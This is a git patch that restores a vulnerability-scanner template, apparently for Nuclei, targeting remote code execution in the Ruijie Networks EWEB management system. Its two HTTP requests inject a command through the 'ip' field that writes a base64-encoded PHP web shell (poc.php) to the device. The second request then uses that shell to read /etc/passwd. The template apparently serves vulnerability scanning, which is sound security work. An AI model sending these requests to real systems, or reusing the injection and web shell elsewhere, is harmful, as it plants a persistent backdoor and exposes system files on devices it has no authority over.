From 94f89b2aeb87c222bd11ff0f73910d4e4630199e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Nov 2022 18:53:08 +0530 Subject: [PATCH] Revert "Delete ruijie-networks-rce.yaml" This reverts commit c9536e95c4a81c619cbfa8c3ab229787f1827a8a. --- .../ruijie/ruijie-networks-rce.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 vulnerabilities/ruijie/ruijie-networks-rce.yaml diff --git a/vulnerabilities/ruijie/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml new file mode 100644 index 0000000000..bf405a66f3 --- /dev/null +++ b/vulnerabilities/ruijie/ruijie-networks-rce.yaml @@ -0,0 +1,43 @@ +id: ruijie-networks-rce + +info: + name: Ruijie Networks-EWEB Network Management System - Remote Code Execution + author: pikpikcu + description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution. + severity: critical + reference: + - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + - https://www.ruijienetworks.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: ruijie,rce,network + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 + + - | + GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "nobody:x:0:0:" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/03